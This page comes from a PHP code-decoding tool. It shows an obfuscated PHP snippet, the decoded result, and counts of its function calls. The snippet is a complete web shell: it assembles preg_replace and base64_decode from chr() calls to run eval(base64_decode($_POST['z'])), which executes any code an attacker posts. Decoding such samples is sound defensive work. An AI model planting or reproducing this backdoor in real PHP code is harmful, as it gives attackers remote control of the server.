Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $a = chr(112)./*1*/chr(114).chr(101)./*1*/chr(103).chr(95).chr(114).chr(101).chr(112..
Decoded Output download
b"eval(base64_decode($_POST['z']));";
Did this file decode correctly?
Original Code
<?php $a = chr(112)./*1*/chr(114).chr(101)./*1*/chr(103).chr(95).chr(114).chr(101).chr(112).chr(108).chr(97).chr(99).chr(101); $c = chr(98).chr(97).chr(115)./*1*/chr(101).chr(54).chr(52)/*1*/.chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b = "ZX"."Zh"."bCh"."iYXN"."lNjRfZ"."GVj"."b2RlK"."CRfU"."E9TVF"."snei"."ddKSk7";$a(chr(47).chr(52).chr(51).chr(56).chr(47).chr(101),$c($b),chr(52).chr(51).chr(56));
Function Calls
| chr | 34 |
| preg_replace | 1 |
| base64_decode | 1 |
Stats
| MD5 | 6a0dd3e169eda5b71cf98974feb63fb5 |
| Eval Count | 1 |
| Decode Time | 101 ms |